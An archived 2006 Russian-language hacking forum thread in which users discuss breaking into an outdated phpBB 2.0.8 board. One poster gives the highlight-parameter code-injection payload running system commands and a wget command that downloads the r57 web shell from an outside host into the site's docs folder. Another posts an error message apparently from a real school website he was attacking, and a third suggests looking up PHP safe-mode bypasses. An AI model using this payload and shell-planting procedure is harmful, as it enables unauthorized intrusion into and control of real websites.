Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 
журналы новости статьи video форум подписка на «Хакер»

Куда залить шелл?

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [В Сети] >> Куда залить шелл?
Имя
Сообщение << Старые топики   Новые топики >>
Куда залить шелл? - 2006-02-02 23:11:50   
Benzin

Сообщений: 234
Оценки: 0
Присоединился: 2005-10-31 16:30:25
 Наткнулся на бажный форум старой версии (2.0.8)
Попробовал узнать где находится wget таким вот запросом:
&highlight=%2527.$poster=''$herase''.%2527&herase=which wget
Оказалось, что он в /usr/bin/wget )\b#i, но нужна директория открытая для записи, я запросил: find ./type d -perm 0777 -ls, но ничего не изменилось т.е осталось /usr/bin/wget )\b#i
Это значит, что нет свободной что ли???
Post #: 1
Куда залить шелл? - 2006-02-03 00:05:40   
DeXN

Сообщений: 192
Оценки: 0
Присоединился: 2005-04-23 19:10:38
 Когда я взламываю phpBB таких версий делаю так:
запрос &highlight=%2527.system($_GET[c]).%2527&c=id
потом which wget, далее ls -la, смотрю куда можно залить шелл и пишу:
wget -O docs/about.php http://your_site.narod.ru/r57shell.php

Вроде всё легко и понятно![sm=2.gif]
Post #: 2
Куда залить шелл? - 2006-02-03 16:30:00   
Benzin

Сообщений: 234
Оценки: 0
Присоединился: 2005-10-31 16:30:25
quote:

—————-<BR>Цитата: Дата:03.02.2006 0:05:40, Автор:DeXN ::
Когда я взламываю phpBB таких версий делаю так:<BR><BR>запрос &amp;amp;amp;highlight=%2527.system($_GET[c]).%2527&amp;amp;amp;c=id<BR><BR>потом which wget, далее ls -la, смотрю куда можно залить шелл и пишу: <BR><BR>wget -O docs/about.php http://your_site.narod.ru/r57shell.php<BR><BR><BR>Вроде всё легко и понятно![sm=2.gif]
—————-



Дело в том что такой страницы: &highlight=%2527.system($_GET[c]).%2527&c=id (в моем случае) не существует
Post #: 3
Куда залить шелл? - 2006-02-04 17:57:23   
Benzin

Сообщений: 234
Оценки: 0
Присоединился: 2005-10-31 16:30:25
 Warning: shell_exec(): Cannot execute using backquotes in Safe Mode in /hsphere/local/home/burdinar/school.burdina.ru/forum/viewtopic.php(1104) : regexp code on line 1

Че это значит?
Post #: 4
Куда залить шелл? - 2006-02-04 18:24:51   
MrBlack

Сообщений: 268
Оценки: 0
Присоединился: 2004-05-24 00:02:27
quote:

—————-<BR>Цитата: Дата:04.02.2006 17:57:23, Автор:Benzin ::
Warning: shell_exec(): Cannot execute using backquotes in Safe Mode in /hsphere/local/home/burdinar/school.burdina.ru/forum/viewtopic.php(1104) : regexp code on line 1<BR><BR><BR>Че это значит?
—————-


А то и значит, что ты в safe mode. Всё ж сам написал [sm=9.gif] Ищи статьи про обход safe mode в php
Post #: 5
Страниц:  [1]
Все форумы >> [В Сети] >> Куда залить шелл?







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.